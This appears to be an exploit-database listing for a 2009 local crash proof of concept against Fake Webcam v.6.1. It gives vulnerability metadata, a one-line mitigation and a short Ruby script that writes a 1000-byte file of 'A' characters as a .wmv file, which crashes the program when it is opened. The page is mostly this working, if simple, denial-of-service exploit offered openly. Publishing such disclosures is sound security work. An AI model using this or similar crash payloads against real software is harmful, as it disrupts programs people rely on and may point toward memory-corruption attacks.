header-logo
Suggest Exploit
vendor:
Fake Webcam
by:
Anastasios Monachos
7.5
CVSS
HIGH
Local Crash
119
CWE
Product Name: Fake Webcam
Affected Version From: v.6.1
Affected Version To: v.6.1
Patch Exists: YES
Related CWE: N/A
CPE: fakewebcam.com/Download/setup.exe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP1/SP2 EN
2009

Fake Webcam v.6.1 Local Crash PoC

This PoC crashes the process of Fake Webcam v.6.1 by creating a file with 1000 'A' characters and writing it to the path 'c:a.wmv'

Mitigation:

Update to the latest version of Fake Webcam
Source

Exploit-DB raw data:

#!/usr/bin/ruby
#############################################################################
# Title:		Fake Webcam v.6.1 Local Crash PoC
# Impact: 		Crashes the process
# Tested on: 	Windows XP SP1/SP2 EN
# Target:  		Fake Webcam v.6.1
# Download Link:	http://www.fakewebcam.com/Download/setup.exe
# Author:		Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
# Greetz: 		offsec team, inj3ct0r team
#############################################################################
path = "c:\\a.wmv" #wmv/avi/flv/mpeg/mp4
f = open(path, "wb")
f.write("\x41" * 1000)
f.close()

Navigation

Suggest Exploit

Services By CQR